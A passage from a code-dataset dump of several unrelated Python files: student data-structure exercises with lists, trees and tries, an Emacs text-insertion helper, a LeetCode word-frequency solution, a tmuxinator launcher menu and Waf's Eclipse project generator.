s + \" -> \" + str(current)\n                current = current.next\n        if not s: # s == '':\n            s = 'empty list'\n        return s\n\n    def append(self,e):\n        if not self.tail: # self.head == None:\n            self.tail = ListNode(e,None)\n            self.tail.next = self.tail\n        else:\n            n = ListNode(e, self.tail.next)\n            self.tail.next = n\n            self.tail = n\n\n\n    def delete(self, e):\n        if self.tail:\n            if self.tail.data == e:\n                if self.tail.next == self.tail:\n                    self.tail = None # prints empty list\n                else:\n                    current = self.tail\n\n                    while current.next != self.tail:\n                        current = current.next\n\n                    current.next = current.next.next\n                    
self.tail = current\n\n elif self.tail.next != self.tail:\n current = self.tail\n\n while current.next.data != e and current.next != self.tail:\n current = current.next\n if current.next.data == e:\n current.next = current.next.next\n\n def showLevelOrder(self, queue = deque()):\n for layer in self.root.showLevelOrder():\n print(' '.join([str(l) for l in layer]))\n\n\nmylist = MyCircularList()\nmylist.append(1)\nprint(mylist)\nmylist.append(2)\nprint(mylist)\nmylist.append(3)\nprint(mylist)\nmylist.append(4)\nprint(mylist)\nmylist.delete(4)\nprint(mylist)\n\n\n# Opdracht 3\nprint(\"\\n\\nOpdracht 3 \")\nclass BSTNode:\n def __init__(self,element,left,right):\n self.element = element\n self.left = left\n self.right = right\n\n def __repr__(self,nspaces=0):\n s1 = ''\n s2 = ''\n s3 = ''\n if self.right != None:\n s1 = self.right.__repr__(nspaces + 3)\n s2 = s2 + ' '*nspaces + str(self.element) + '\\n'\n if self.left != None:\n s3 = self.left.__repr__(nspaces + 3)\n return s1 + s2 + s3\n\n def insert(self,e):\n parent = self\n current = None\n found = False\n\n if parent.element < e:\n current = parent.right\n elif parent.element > e:\n current = parent.left\n else:\n found = True;\n\n while not found and current:\n parent = current\n if parent.element < e:\n current = parent.right\n elif parent.element > e:\n current = parent.left\n else:\n found = True\n\n if not found:\n if parent.element < e:\n parent.right = BSTNode(e,None,None)\n else:\n parent.left = BSTNode(e,None,None)\n return not found\n\n def insertArray(self,a, low=0, high=-1):\n if len(a) == 0:\n return\n if high == -1:\n high = len(a)-1\n mid = (low+high+1)//2\n self.insert(a[mid])\n if mid > low:\n self.insertArray(a,low,mid-1)\n if high > mid:\n self.insertArray(a,mid + 1,high)\n\n def search(self,e):\n current = self\n found = False\n while not found and current:\n if current.element < e:\n current = current.right\n elif current.element > e:\n current = current.left\n else:\n found = True\n if found:\n return current\n else:\n return None\n\n def search2(self,e):\n if self.element == e:\n return self\n parent = self.getParent(e)\n if parent == None:\n return None\n if parent.element < e:\n return parent.right\n return parent.left\n\n def getParent(self,e):\n parent = self\n current = None\n found = False\n\n if parent.element < e:\n current = parent.right\n elif parent.element > e:\n current = parent.left;\n else:\n return None\n\n while not found and current:\n if current.element == e:\n found = True\n else:\n parent = current\n if current.element < e:\n current = current.right\n else:\n current = current.left\n if found:\n return parent\n else:\n return None\n\n def parentMinRightTree(self):\n parent = self.right\n current = parent.left\n while current.left:\n parent = current\n current = current.left\n return parent\n\n def delete(self,e):\n parent = self.getParent(e);\n\n if parent == None:\n return False\n if parent.element < e:\n current = parent.right\n if current.left == None:\n parent.right = parent.right.right\n return True\n else:\n if current.right == None:\n parent.right = parent.right.left\n return True\n else:\n current = parent.left\n if current.left == None:\n parent.left = parent.left.right\n return True\n else:\n if current.right == None:\n parent.left = parent.left.left\n return True\n if current.right.left == None:\n current.element = current.right.element\n current.right = current.right.right\n return True\n node = current.parentMinRightTree()\n current.element = node.left.element\n node.left = 
node.left.right\n return True\n\n def max(self):\n if self.right:\n return self.right.max() # recurse: the maximum lives in the rightmost node\n else:\n return self.element\n\n def showLevelOrder(self):\n q = deque()\n q.append(self)\n def iterator(layerSize):\n for i in range(layerSize):\n node = q.popleft()\n if node.left:\n q.append(node.left)\n if node.right:\n q.append(node.right)\n yield node.element\n while (q):\n yield iterator(len(q))\n\nclass BST:\n def __init__(self,a=None):\n if a:\n mid = len(a)//2\n self.root = BSTNode(a[mid],None,None)\n self.root.insertArray(a[:mid])\n self.root.insertArray(a[mid+1:])\n else:\n self.root = None\n\n def __repr__(self):\n if self.root:\n return str(self.root)\n else:\n return 'null-tree'\n\n def search(self,e):\n if self.root and e:\n return self.root.search(e)\n else:\n return None\n\n def insert(self,e):\n if e:\n if self.root:\n return self.root.insert(e)\n else:\n self.root = BSTNode(e,None,None)\n return True\n else:\n return False\n\n def delete(self,e):\n if self.root and e:\n if self.root.element == e:\n if self.root.left == None:\n self.root = self.root.right\n elif self.root.right == None:\n self.root = self.root.left\n elif self.root.right.left == None:\n self.root.element = self.root.right.element\n self.root.right = self.root.right.right\n else:\n node = self.root.parentMinRightTree()\n self.root.element = node.left.element\n node.left = node.left.right\n return True\n else:\n return self.root.delete(e)\n else:\n return False\n\n def max(self):\n if self.root:\n if self.root.right is not None:\n return self.root.right.max()\n else:\n return self.root.element\n else:\n return \"Empty Tree\"\n\n def rsearch(self, e):\n return self.find(self.root, e)\n\n def find(self, currentNode, e):\n if currentNode is None:\n return False\n elif currentNode.element == e:\n return currentNode\n elif e < currentNode.element:\n return self.find(currentNode.left, e)\n else:\n return self.find(currentNode.right, e)\n\n def rinsert(self, e):\n if self.root == None:\n self.root = BSTNode(e,None,None)\n else:\n return self._rinsert(self.root, e)\n\n def _rinsert(self, currentNode, e):\n if currentNode.element > e:\n if currentNode.left:\n self._rinsert(currentNode.left,e)\n else:\n currentNode.left = BSTNode(e,None,None)\n elif currentNode.element <= e:\n if currentNode.right:\n self._rinsert(currentNode.right,e)\n else:\n currentNode.right = BSTNode(e,None,None)\n\n def showLevelOrder(self):\n for layer in self.root.showLevelOrder():\n print(' '.join([str(l) for l in layer]))\n\n\nb = BST()\nb.rinsert(1)\nprint(b)\nb.rinsert(2)\nprint(b)\nb.rinsert(3)\nprint(b)\nb.rinsert(4)\nprint(b)\nb.delete(4)\nprint(b)\n\nprint(\"Max = \", b.max())\nprint(b.rsearch(3))\nprint('----------------')\n\nb = BST()\nb.insert(4)\nb.insert(2)\nb.insert(1)\nb.insert(3)\nb.insert(6)\nb.insert(5)\nb.insert(7)\n\nprint(b)\nb.showLevelOrder()\n\n#Opdracht 4\nprint(\"Opdracht 4\")\n\nfrom itertools import permutations\nfrom itertools import combinations\nfrom collections import deque\nimport string\nimport operator\n\ndef hasNumbers(inputString):\n return any(char.isdigit() for char in inputString)\n\ndef filterText(txt):\n return [word.strip(string.punctuation).lower() for word in txt.split() if not hasNumbers(word)]\n\ndef readFile(path):\n f = open(path, \"r\")\n data = f.read()\n f.close()\n return data\n\ndef writeFile(path, data):\n f = open(path,\"w\") # \"w\" truncates/creates the output file; \"r+\" fails when it is missing\n for key, value in data.items():\n f.write(key + \" :: \" + str(value) + \"\\n\")\n f.close()\n\ndef analyzeWithDict(text):\n words = filterText(text)\n dic =
{}\n for word in words:\n if word in dic:\n dic[word] += 1\n else:\n dic[word] = 1\n return dic\n\nclass Word:\n def __init__(self):\n self.count = 1\n self.branch = {}\n self.terminate = False\n\n def __repr__(self):\n return str(self.branch) + \":\" + str(self.count) + \"\\n\"\n\n def writeWords(self, string, f):\n for i in self.branch:\n s = string + str(i)\n value = str(self.branch[i].count)\n\n if self.branch[i].terminate:\n line = s + \" :: \" + str(value) + \"\\n\"\n f.write(line)\n\n self.branch[i].writeWords(s, f)\n\n\nclass Trie: # re-indented consistently: the original mixed tabs and spaces, a TabError in Python 3\n def __init__(self, file_name = None):\n self.root = Word()\n\n def __repr__(self):\n return str(self.root)\n\n def insert(self, string):\n if self.root:\n current = self.root\n for index, letter in enumerate(string):\n if letter in current.branch:\n current = current.branch[letter]\n current.count += 1\n else:\n current.branch.update({ letter: Word() })\n current = current.branch[letter]\n if (index + 1) == len(string):\n current.terminate = True\n else:\n return\n\n def writeWords(self, f):\n self.root.writeWords(\"\", f)\n\ntrie = Trie()\n\ndef analyzeWTrie(text):\n words = filterText(text)\n for word in words:\n trie.insert(word)\n\n# input source file\ndata = (readFile(\"kingjamesbible.txt\"))\n\nanalyzedDictionary = analyzeWithDict(data)\nwriteFile(\"outputDict.txt\", analyzedDictionary)\n\nanalyzeWTrie(data)\n\n# write the trie to a file\nf = open(\"outputTrie.txt\", \"w\")\ntrie.writeWords(f)\nf.close()\n\n\ndef compareFiles(dictPath, triePath):\n dic = toDictionary(dictPath)\n trie = toDictionary(triePath)\n\n print('dictionary length: ', len(dic))\n print('trie length: ', len(trie))\n\n shared_items = set(dic.items()) & set(trie.items())\n differences = { k : dic[k] for k in set(dic) - set(trie) }\n\n print('differences', differences)\n print('shared items', len(shared_items))\n print('are equal', dic == trie)\n\ndef toDictionary(path):\n dic = { }\n with open(path) as f:\n for line in f:\n key = line.split('::')[0].strip(string.whitespace)\n key = key.lower()\n value = line.split('::')[1].strip(string.whitespace)\n dic[key] = value\n return dic\n\ncompareFiles(\"outputDict.txt\", \"outputTrie.txt\")\n\n\n# wordcount = {}\n# fileSource = \"kingjamesbible.txt\"\n# wordcount = readFileIntoDic(fileSource)\n# print(wordcount)\n# writeDicTofile(wordcount)\n\ntrie = Trie()\nword = \"aapje\"\ntrie.insert(\"aap\")\n","sub_path":"week3.py","file_name":"week3.py","file_ext":"py","file_size_in_byte":14406,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
{"seq_id":"425368374","text":"import mdlog\nlog = mdlog.getLogger(__name__)\n\nfrom Actions import Text\nfrom rules.emacs.Cmd import runEmacsCmd\n\ndef emacsBool(b):\n if b:\n return \"t\"\n return \"nil\"\n\nclass EmacsText(Text):\n def __init__(self, data, lower=True, capitalCheck=True, spaceCheck=True,\n allCaps=False):\n Text.__init__(self, data, lower=lower)\n self.capitalCheck = capitalCheck and not allCaps\n self.spaceCheck = spaceCheck \n self.allCaps = allCaps\n\n def _print(self, words):\n # There's no good elisp way to handle putting characters into\n # the search box AFAIK.
You can get text in there but giving it\n # focus disables search as you type.\n inSearchMode = runEmacsCmd(\"isearch-mode\") != 'nil'\n inMiniBuffer = '*Minibuf-' in runEmacsCmd(\"(with-current-buffer (buffer-name))\")\n words = words if not self.allCaps else [i.upper() for i in words]\n if inSearchMode or inMiniBuffer:\n Text._print(self, words)\n else:\n runEmacsCmd(\"(md-insert-text \\\"%s\\\" %s %s)\" % (words, emacsBool(self.spaceCheck),\n emacsBool(self.capitalCheck)), dolog=True,\n queryOnly=False)\n \n","sub_path":"rules/emacs/Text.py","file_name":"Text.py","file_ext":"py","file_size_in_byte":1230,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
{"seq_id":"550704364","text":"class Trie(object):\n def __init__(self):\n self.sons = {}\n\n def insert(self, word):\n p = self.sons\n for x in word:\n if x not in p:\n p[x] = {}\n p = p[x]\n p['end'] = p.get('end', 0) + 1\n\n def search(self, word):\n p = self.sons\n for x in word:\n if x not in p:\n return 0\n p = p[x]\n return p.get('end', 0)\n\n\nclass WordsFrequency(object):\n \"\"\"\nDesign a method that finds how often any given word occurs in a book.\nYour implementation should support the following operations:\nWordsFrequency(book) - constructor, taking the book as an array of strings\nget(word) - returns how often the given word occurs in the book\n\nExample:\nWordsFrequency wordsFrequency = new WordsFrequency({\"i\", \"have\", \"an\", \"apple\", \"he\", \"have\", \"a\", \"pen\"});\nwordsFrequency.get(\"you\"); // returns 0, \"you\" never occurs\nwordsFrequency.get(\"have\"); // returns 2, \"have\" occurs twice\nwordsFrequency.get(\"an\"); // returns 1\nwordsFrequency.get(\"apple\"); // returns 1\nwordsFrequency.get(\"pen\"); // returns 1\nHints:\nbook[i] contains lowercase letters only\n1 <= book.length <= 100000\n1 <= book[i].length <= 10\nget will be called at most 100000 times\nLink: https://leetcode-cn.com/problems/words-frequency-lcci\n \"\"\"\n def __init__(self, book):\n \"\"\"\n :type book: List[str]\n \"\"\"\n self.trie = Trie()\n for word in book:\n self.trie.insert(word)\n\n def get(self, word):\n \"\"\"\n :type word: str\n :rtype: int\n \"\"\"\n return self.trie.search(word)\n\n\ndef main():\n commands = [\"WordsFrequency\",\"get\",\"get\",\"get\",\"get\",\"get\"], \\\n [[[\"i\",\"have\",\"an\",\"apple\",\"he\",\"have\",\"a\",\"pen\"]],[\"you\"],[\"have\"],[\"an\"],[\"apple\"],[\"pen\"]]\n ret = []\n for i, x in enumerate(commands[0]):\n if x == 'WordsFrequency':\n test = WordsFrequency(commands[1][i][0])\n ret.append(None)\n elif x == 'get':\n ret.append(test.get(commands[1][i][0]))\n\n print(ret)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"py-程序员面试金典-面试题 16.02. 单词频率-字典树套哈希表.py","file_name":"py-程序员面试金典-面试题 16.02. 单词频率-字典树套哈希表.py","file_ext":"py","file_size_in_byte":2074,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
{"seq_id":"105097523","text":"import sys\nimport os\n\nprint(\"\"\"Select session to initialize:\n1. TERM\n2.
Haskell IDE\n\nPress enter to quit\n\"\"\")\nwhile True:\n\n answer = input(\"Selection: \")\n\n if (answer == \"\"):\n sys.exit()\n elif answer == \"1\": # input() returns a string, so compare against \"1\", not the int 1\n os.system(\"tmuxinator start TERM\")\n sys.exit()\n elif answer == \"2\":\n os.system(\"tmuxinator start haskell\")\n sys.exit()\n else:\n print(\"Not a valid choice.\")\n","sub_path":"dotfiles/init.py","file_name":"init.py","file_ext":"py","file_size_in_byte":418,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
{"seq_id":"424811976","text":"class Node:\n\n\tdef __init__(self):\n\t\tself.word_number = -1\n\t\tself.visited = False\n\t\tself.cnt = [0 for i in range(26)]\n\t\tself.next = {}\n\nclass Trie:\n\n\tdef __init__(self):\n\t\tself.root = Node()\n\t\tself.word_index = 0\n\t\tself.words = []\n\n\tdef add(self, word):\n\t\titerator = self.root\n\n\t\t# save the word in self.words\n\t\tself.words.append(word)\n\n\t\t# save the word in the trie\n\t\tfor char in word:\n\t\t\tif char not in iterator.next:\n\t\t\t\titerator.next[char] = Node()\n\t\t\titerator = iterator.next[char]\n\t\titerator.word_number = self.word_index\n\t\tself.word_index += 1\n\n\tdef find(self, word):\n\t\titerator = self.root\n\t\tfor char in word:\n\t\t\tif char not in iterator.next:\n\t\t\t\treturn False\n\t\t\titerator = iterator.next[char]\n\t\treturn iterator.word_number != -1 # a node ends a word iff add() assigned it a word_number (there is no is_word attribute)","sub_path":"share/anagram/trie.py","file_name":"trie.py","file_ext":"py","file_size_in_byte":726,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
{"seq_id":"163955878","text":"#! /usr/bin/env python\n# Eclipse CDT 5.0 generator for Waf\n# Richard Quirk 2009-2011 (New BSD License)\n# Thomas Nagy 2011 (ported to Waf 1.6)\n\"\"\"\nUsage:\n\ndef options(opt):\n\topt.load('eclipse')\n\n$ waf configure eclipse\n\"\"\"\nimport os\nimport sys\nfrom xml.dom.minidom import Document\n\nfrom waflib import Build\nfrom waflib import Context\nfrom waflib import Errors\nfrom waflib import Logs\nfrom waflib import Node\nfrom waflib import Scripting\nfrom waflib import TaskGen\nfrom waflib import Utils\n\nSTANDARD_INCLUDES = [\"/usr/local/include\", \"/usr/include\"]\n\noe_cdt = \"org.eclipse.cdt\"\ncdt_mk = oe_cdt + \".make.core\"\ncdt_core = oe_cdt + \".core\"\ncdt_bld = oe_cdt + \".build.core\"\nextbuilder_dir = \".externalToolBuilders\"\nextbuilder_name = \"Waf_Builder.launch\"\n\n\nclass eclipse(Build.BuildContext):\n cmd = \"eclipse\"\n fun = Scripting.default_cmd\n\n def execute(self):\n \"\"\"\n Entry point\n \"\"\"\n self.restore()\n if not self.all_envs:\n self.load_envs()\n self.recurse([self.run_dir])\n\n appname = getattr(\n Context.g_module, Context.APPNAME, os.path.basename(self.srcnode.abspath())\n )\n self.create_cproject(appname, pythonpath=self.env[\"ECLIPSE_PYTHON_PATH\"])\n\n # Helper to dump the XML document content to XML with UTF-8 encoding\n def write_conf_to_xml(self, filename, document):\n self.srcnode.make_node(filename).write(\n document.toprettyxml(encoding=\"UTF-8\"), flags=\"wb\"\n )\n\n def create_cproject(self, appname, workspace_includes=[], pythonpath=[]):\n \"\"\"\n Create the Eclipse CDT .project and .cproject files\n @param appname The name that will appear in the Project Explorer\n @param build The BuildContext object to extract includes from\n @param workspace_includes Optional project includes to prevent\n \"Unresolved Inclusion\" errors in the Eclipse editor\n @param pythonpath Optional project specific python paths\n \"\"\"\n hasc = hasjava = haspython = False\n source_dirs = []\n
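# gather include paths: absolute (system) include dirs accumulate in cpppath,\n # project-relative ones in workspace_includes as the task generators are walked\n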
cpppath = self.env[\"CPPPATH\"]\n javasrcpath = []\n javalibpath = []\n includes = STANDARD_INCLUDES\n if sys.platform != \"win32\":\n cc = self.env.CC or self.env.CXX\n if cc:\n cmd = cc + [\"-xc++\", \"-E\", \"-Wp,-v\", \"-\"]\n try:\n gccout = self.cmd_and_log(\n cmd, output=Context.STDERR, quiet=Context.BOTH, input=b\"\\n\"\n ).splitlines()\n except Errors.WafError:\n pass\n else:\n includes = []\n for ipath in gccout:\n if ipath.startswith(\" /\"):\n includes.append(ipath[1:])\n cpppath += includes\n Logs.warn(\"Generating Eclipse CDT project files\")\n\n for g in self.groups:\n for tg in g:\n if not isinstance(tg, TaskGen.task_gen):\n continue\n\n tg.post()\n\n # Add local Python modules paths to configuration so object resolving will work in IDE\n # This may also contain generated files (ie. pyqt5 or protoc) that get picked from build\n if \"py\" in tg.features:\n pypath = tg.path.relpath()\n py_installfrom = getattr(tg, \"install_from\", None)\n if isinstance(py_installfrom, Node.Node):\n pypath = py_installfrom.path_from(\n self.root.make_node(self.top_dir)\n )\n if pypath not in pythonpath:\n pythonpath.append(pypath)\n haspython = True\n\n # Add Java source directories so object resolving works in IDE\n # This may also contain generated files (ie. protoc) that get picked from build\n if \"javac\" in tg.features:\n java_src = tg.path.relpath()\n java_srcdir = getattr(tg.javac_task, \"srcdir\", None)\n if java_srcdir:\n if isinstance(java_srcdir, Node.Node):\n java_srcdir = [java_srcdir]\n for x in Utils.to_list(java_srcdir):\n x = x.path_from(self.root.make_node(self.top_dir))\n if x not in javasrcpath:\n javasrcpath.append(x)\n else:\n if java_src not in javasrcpath:\n javasrcpath.append(java_src)\n hasjava = True\n\n # Check if there are external dependencies and add them as external jar so they will be resolved by Eclipse\n usedlibs = getattr(tg, \"use\", [])\n for x in Utils.to_list(usedlibs):\n for cl in Utils.to_list(tg.env[\"CLASSPATH_\" + x]):\n if cl not in javalibpath:\n javalibpath.append(cl)\n\n if not getattr(tg, \"link_task\", None):\n continue\n\n features = Utils.to_list(getattr(tg, \"features\", \"\"))\n\n is_cc = \"c\" in features or \"cxx\" in features\n\n incnodes = tg.to_incnodes(\n tg.to_list(getattr(tg, \"includes\", [])) + tg.env[\"INCLUDES\"]\n )\n for p in incnodes:\n path = p.path_from(self.srcnode)\n\n if path.startswith(\"/\"):\n cpppath.append(path)\n else:\n workspace_includes.append(path)\n\n if is_cc and path not in source_dirs:\n source_dirs.append(path)\n\n hasc = True\n\n waf_executable = os.path.abspath(sys.argv[0])\n project = self.impl_create_project(\n sys.executable, appname, hasc, hasjava, haspython, waf_executable\n )\n self.write_conf_to_xml(\".project\", project)\n\n if hasc:\n project = self.impl_create_cproject(\n sys.executable,\n waf_executable,\n appname,\n workspace_includes,\n cpppath,\n source_dirs,\n )\n self.write_conf_to_xml(\".cproject\", project)\n\n if haspython:\n project = self.impl_create_pydevproject(sys.path, pythonpath)\n self.write_conf_to_xml(\".pydevproject\", project)\n\n if hasjava:\n project = self.impl_create_javaproject(javasrcpath, javalibpath)\n self.write_conf_to_xml(\".classpath\", project)\n\n def impl_create_project(\n self, executable, appname, hasc, hasjava, haspython, waf_executable\n ):\n doc = Document()\n projectDescription = doc.createElement(\"projectDescription\")\n self.add(doc, projectDescription, \"name\", appname)\n self.add(doc, projectDescription, \"comment\")\n self.add(doc, 
projectDescription, \"projects\")\n buildSpec = self.add(doc, projectDescription, \"buildSpec\")\n buildCommand = self.add(doc, buildSpec, \"buildCommand\")\n self.add(doc, buildCommand, \"triggers\", \"clean,full,incremental,\")\n arguments = self.add(doc, buildCommand, \"arguments\")\n dictionaries = {}\n\n # If CDT is present, instruct this one to call waf as it is more flexible (separate build/clean ...)\n if hasc:\n self.add(\n doc,\n buildCommand,\n \"name\",\n oe_cdt + \".managedbuilder.core.genmakebuilder\",\n )\n # the default make-style targets are overwritten by the .cproject values\n dictionaries = {\n cdt_mk + \".contents\": cdt_mk + \".activeConfigSettings\",\n cdt_mk + \".enableAutoBuild\": \"false\",\n cdt_mk + \".enableCleanBuild\": \"true\",\n cdt_mk + \".enableFullBuild\": \"true\",\n }\n else:\n # Otherwise for Java/Python an external builder tool is created that will call waf build\n self.add(\n doc,\n buildCommand,\n \"name\",\n \"org.eclipse.ui.externaltools.ExternalToolBuilder\",\n )\n dictionaries = {\n \"LaunchConfigHandle\": \"/%s/%s\"\n % (extbuilder_dir, extbuilder_name)\n }\n # The definition is in a separate directory XML file\n try:\n os.mkdir(extbuilder_dir)\n except OSError:\n pass # Ignore error if already exists\n\n # Populate here the external builder XML calling waf\n builder = Document()\n launchConfiguration = doc.createElement(\"launchConfiguration\")\n launchConfiguration.setAttribute(\n \"type\",\n \"org.eclipse.ui.externaltools.ProgramBuilderLaunchConfigurationType\",\n )\n self.add(\n doc,\n launchConfiguration,\n \"booleanAttribute\",\n {\n \"key\": \"org.eclipse.debug.ui.ATTR_LAUNCH_IN_BACKGROUND\",\n \"value\": \"false\",\n },\n )\n self.add(\n doc,\n launchConfiguration,\n \"booleanAttribute\",\n {\n \"key\": \"org.eclipse.ui.externaltools.ATTR_TRIGGERS_CONFIGURED\",\n \"value\": \"true\",\n },\n )\n self.add(\n doc,\n launchConfiguration,\n \"stringAttribute\",\n {\n \"key\": \"org.eclipse.ui.externaltools.ATTR_LOCATION\",\n \"value\": waf_executable,\n },\n )\n self.add(\n doc,\n launchConfiguration,\n \"stringAttribute\",\n {\n \"key\": \"org.eclipse.ui.externaltools.ATTR_RUN_BUILD_KINDS\",\n \"value\": \"full,incremental,\",\n },\n )\n self.add(\n doc,\n launchConfiguration,\n \"stringAttribute\",\n {\n \"key\": \"org.eclipse.ui.externaltools.ATTR_TOOL_ARGUMENTS\",\n \"value\": \"build\",\n },\n )\n self.add(\n doc,\n launchConfiguration,\n \"stringAttribute\",\n {\n \"key\": \"org.eclipse.ui.externaltools.ATTR_WORKING_DIRECTORY\",\n \"value\": \"${project_loc}\",\n },\n )\n builder.appendChild(launchConfiguration)\n # And write the XML to the file references before\n self.write_conf_to_xml(\n f\"{extbuilder_dir}{os.path.sep}{extbuilder_name}\", builder\n )\n\n for k, v in dictionaries.items():\n self.addDictionary(doc, arguments, k, v)\n\n natures = self.add(doc, projectDescription, \"natures\")\n\n if hasc:\n nature_list = \"\"\"\n\t\t\t\tcore.ccnature\n\t\t\t\tmanagedbuilder.core.ScannerConfigNature\n\t\t\t\tmanagedbuilder.core.managedBuildNature\n\t\t\t\tcore.cnature\n\t\t\t\"\"\".split()\n for n in nature_list:\n self.add(doc, natures, \"nature\", oe_cdt + \".\" + n)\n\n if haspython:\n self.add(doc, natures, \"nature\", \"org.python.pydev.pythonNature\")\n if hasjava:\n self.add(doc, natures, \"nature\", \"org.eclipse.jdt.core.javanature\")\n\n doc.appendChild(projectDescription)\n return doc\n\n def impl_create_cproject(\n self,\n executable,\n waf_executable,\n appname,\n workspace_includes,\n cpppath,\n source_dirs=[],\n ):\n 
doc = Document()\n doc.appendChild(doc.createProcessingInstruction(\"fileVersion\", \"4.0.0\"))\n cconf_id = cdt_core + \".default.config.1\"\n cproject = doc.createElement(\"cproject\")\n storageModule = self.add(\n doc, cproject, \"storageModule\", {\"moduleId\": cdt_core + \".settings\"}\n )\n cconf = self.add(doc, storageModule, \"cconfiguration\", {\"id\": cconf_id})\n\n storageModule = self.add(\n doc,\n cconf,\n \"storageModule\",\n {\n \"buildSystemId\": oe_cdt\n + \".managedbuilder.core.configurationDataProvider\",\n \"id\": cconf_id,\n \"moduleId\": cdt_core + \".settings\",\n \"name\": \"Default\",\n },\n )\n\n self.add(doc, storageModule, \"externalSettings\")\n\n extensions = self.add(doc, storageModule, \"extensions\")\n extension_list = \"\"\"\n\t\t\tVCErrorParser\n\t\t\tMakeErrorParser\n\t\t\tGCCErrorParser\n\t\t\tGASErrorParser\n\t\t\tGLDErrorParser\n\t\t\"\"\".split()\n self.add(\n doc,\n extensions,\n \"extension\",\n {\"id\": cdt_core + \".ELF\", \"point\": cdt_core + \".BinaryParser\"},\n )\n for e in extension_list:\n self.add(\n doc,\n extensions,\n \"extension\",\n {\"id\": cdt_core + \".\" + e, \"point\": cdt_core + \".ErrorParser\"},\n )\n\n storageModule = self.add(\n doc,\n cconf,\n \"storageModule\",\n {\"moduleId\": \"cdtBuildSystem\", \"version\": \"4.0.0\"},\n )\n config = self.add(\n doc,\n storageModule,\n \"configuration\",\n {\n \"artifactName\": appname,\n \"id\": cconf_id,\n \"name\": \"Default\",\n \"parent\": cdt_bld + \".prefbase.cfg\",\n },\n )\n folderInfo = self.add(\n doc,\n config,\n \"folderInfo\",\n {\"id\": cconf_id + \".\", \"name\": \"/\", \"resourcePath\": \"\"},\n )\n\n toolChain = self.add(\n doc,\n folderInfo,\n \"toolChain\",\n {\n \"id\": cdt_bld + \".prefbase.toolchain.1\",\n \"name\": \"No ToolChain\",\n \"resourceTypeBasedDiscovery\": \"false\",\n \"superClass\": cdt_bld + \".prefbase.toolchain\",\n },\n )\n\n self.add(\n doc,\n toolChain,\n \"targetPlatform\",\n {\n \"binaryParser\": \"org.eclipse.cdt.core.ELF\",\n \"id\": cdt_bld + \".prefbase.toolchain.1\",\n \"name\": \"\",\n },\n )\n\n waf_build = f'\"{waf_executable}\" {eclipse.fun}'\n waf_clean = '\"%s\" clean' % (waf_executable)\n self.add(\n doc,\n toolChain,\n \"builder\",\n {\n \"autoBuildTarget\": waf_build,\n \"command\": executable,\n \"enableAutoBuild\": \"false\",\n \"cleanBuildTarget\": waf_clean,\n \"enableIncrementalBuild\": \"true\",\n \"id\": cdt_bld + \".settings.default.builder.1\",\n \"incrementalBuildTarget\": waf_build,\n \"managedBuildOn\": \"false\",\n \"name\": \"Gnu Make Builder\",\n \"superClass\": cdt_bld + \".settings.default.builder\",\n },\n )\n\n tool_index = 1\n for tool_name in (\"Assembly\", \"GNU C++\", \"GNU C\"):\n tool = self.add(\n doc,\n toolChain,\n \"tool\",\n {\n \"id\": cdt_bld + \".settings.holder.\" + str(tool_index),\n \"name\": tool_name,\n \"superClass\": cdt_bld + \".settings.holder\",\n },\n )\n if cpppath or workspace_includes:\n incpaths = cdt_bld + \".settings.holder.incpaths\"\n option = self.add(\n doc,\n tool,\n \"option\",\n {\n \"id\": incpaths + \".\" + str(tool_index),\n \"name\": \"Include Paths\",\n \"superClass\": incpaths,\n \"valueType\": \"includePath\",\n },\n )\n for i in workspace_includes:\n self.add(\n doc,\n option,\n \"listOptionValue\",\n {\n \"builtIn\": \"false\",\n \"value\": f'\"${{workspace_loc:/{appname}/{i}}}\"',\n },\n )\n for i in cpppath:\n self.add(\n doc,\n option,\n \"listOptionValue\",\n {\"builtIn\": \"false\", \"value\": '\"%s\"' % (i)},\n )\n if tool_name == \"GNU C++\" or tool_name == 
\"GNU C\":\n self.add(\n doc,\n tool,\n \"inputType\",\n {\n \"id\": \"org.eclipse.cdt.build.core.settings.holder.inType.\"\n + str(tool_index),\n \"languageId\": \"org.eclipse.cdt.core.gcc\"\n if tool_name == \"GNU C\"\n else \"org.eclipse.cdt.core.g++\",\n \"languageName\": tool_name,\n \"sourceContentType\": \"org.eclipse.cdt.core.cSource,org.eclipse.cdt.core.cHeader\",\n \"superClass\": \"org.eclipse.cdt.build.core.settings.holder.inType\",\n },\n )\n tool_index += 1\n\n if source_dirs:\n sourceEntries = self.add(doc, config, \"sourceEntries\")\n for i in source_dirs:\n self.add(\n doc,\n sourceEntries,\n \"entry\",\n {\n \"excluding\": i,\n \"flags\": \"VALUE_WORKSPACE_PATH|RESOLVED\",\n \"kind\": \"sourcePath\",\n \"name\": \"\",\n },\n )\n self.add(\n doc,\n sourceEntries,\n \"entry\",\n {\n \"flags\": \"VALUE_WORKSPACE_PATH|RESOLVED\",\n \"kind\": \"sourcePath\",\n \"name\": i,\n },\n )\n\n storageModule = self.add(\n doc, cconf, \"storageModule\", {\"moduleId\": cdt_mk + \".buildtargets\"}\n )\n buildTargets = self.add(doc, storageModule, \"buildTargets\")\n\n def addTargetWrap(name, runAll):\n return self.addTarget(\n doc,\n buildTargets,\n executable,\n name,\n f'\"{waf_executable}\" {name}',\n runAll,\n )\n\n addTargetWrap(\"configure\", True)\n addTargetWrap(\"dist\", False)\n addTargetWrap(\"install\", False)\n addTargetWrap(\"check\", False)\n\n storageModule = self.add(\n doc,\n cproject,\n \"storageModule\",\n {\"moduleId\": \"cdtBuildSystem\", \"version\": \"4.0.0\"},\n )\n\n self.add(\n doc,\n storageModule,\n \"project\",\n {\"id\": \"%s.null.1\" % appname, \"name\": appname},\n )\n\n doc.appendChild(cproject)\n return doc\n\n def impl_create_pydevproject(self, system_path, user_path):\n # create a pydevproject file\n doc = Document()\n doc.appendChild(\n doc.createProcessingInstruction(\"eclipse-pydev\", 'version=\"1.0\"')\n )\n pydevproject = doc.createElement(\"pydev_project\")\n prop = self.add(\n doc,\n pydevproject,\n \"pydev_property\",\n \"python %d.%d\" % (sys.version_info[0], sys.version_info[1]),\n )\n prop.setAttribute(\"name\", \"org.python.pydev.PYTHON_PROJECT_VERSION\")\n prop = self.add(doc, pydevproject, \"pydev_property\", \"Default\")\n 